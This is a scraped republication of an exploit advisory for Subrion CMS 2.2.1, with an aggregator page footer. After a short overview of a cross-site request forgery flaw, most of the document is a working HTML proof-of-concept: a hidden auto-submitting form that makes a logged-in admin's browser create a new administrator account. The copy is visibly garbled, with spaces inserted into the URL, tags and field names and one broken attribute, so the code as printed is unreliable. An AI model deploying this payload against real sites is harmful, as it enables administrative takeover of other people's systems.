Subrion CMS 2.2.1 CSRF add Administrator

Source: Internet
Author: User

<! --
Title: Subrion CMS 2.2.1 CSRF Add Admin Exploit
Author: Intelliants LLC
Official Website: http://www.subrion.com
Affected Versions: 2.2.1
 
Abstract:

Subrion is a free open source content management system. It's
Written in PHP 5 and utilizes MySQL database. Subrion CMS can be easily
Integrated into your current website or used as a stand alone platform.
It's extremely flexible and scalable php system that stands for a content
Management framework.
 
Overview: The application allows users to perform certain actions via HTTP
Requests without authentication Ming any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative
Privileges if a logged-in user visits a malicious web site.
 
-Usergroup 1-Administrator
-Usergroup 2-Moderator
-Usergroup 8-Registered
 
 
Test Platform: Microsoft Windows 7 Ultimate SP1 (EN)
Apache 2.4.2 (Win32)
PHP 5.4.4
MySQL 5.5.25a
 
 
Discoverer: Gjoko 'liquidworm' Krstic @ zeroscience
 
-->
 
 
<Html>
<Head>
<Title> Subrion CMS 2.2.1 CSRF Add Admin Exploit </title>
</Head>
<Body> <center> <br/>
<Form method = "post" action = "http: // www.2cto.com/subrion/admin/accounts/add/" onsubmit = "forge ()">
<Input type = "hidden" name = "username" value = "Commando"/>
<Input type = "hidden" name = "fullname" value = "Arnold Schwarzenegger"/>
<Input type = "hidden" name = "email" value = "lab@zeroscience.mk"/>
<Input type = "hidden" name = "_ password" value = "l33tP4ss! "/>
<Input type = "hidden" name = "_ password2" value = "l33tP4ss! "/>
<Input type = "hidden" name = "usergroup" value = "1"/>
<Input type = "hidden" name = "avatar" value = "/>
<Input type = "hidden" name = "sorted sored" value = "0"/>
<Input type = "hidden" name = "plan_id" value = "1"/>
<Input type = "hidden" name = "sponsored_end" value = ""/>
<Input type = "hidden" name = "status" value = "active"/>
<Input type = "hidden" name = "save" value = "Add"/>
<Input type = "hidden" name = "goto" value = "list"/>
<Input type = "hidden" name = "old_name" value = "ZSL"/>
<Input type = "hidden" name = "id" value = ""/>
<Input type = "submit" id = "exploit" value = "Forge! "/>
</Form> </center>
<Script type = "text/javascript">
Function forge () {document. getElementById ("exploit"). click ();}
</Script>
</Body>
</Html>

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.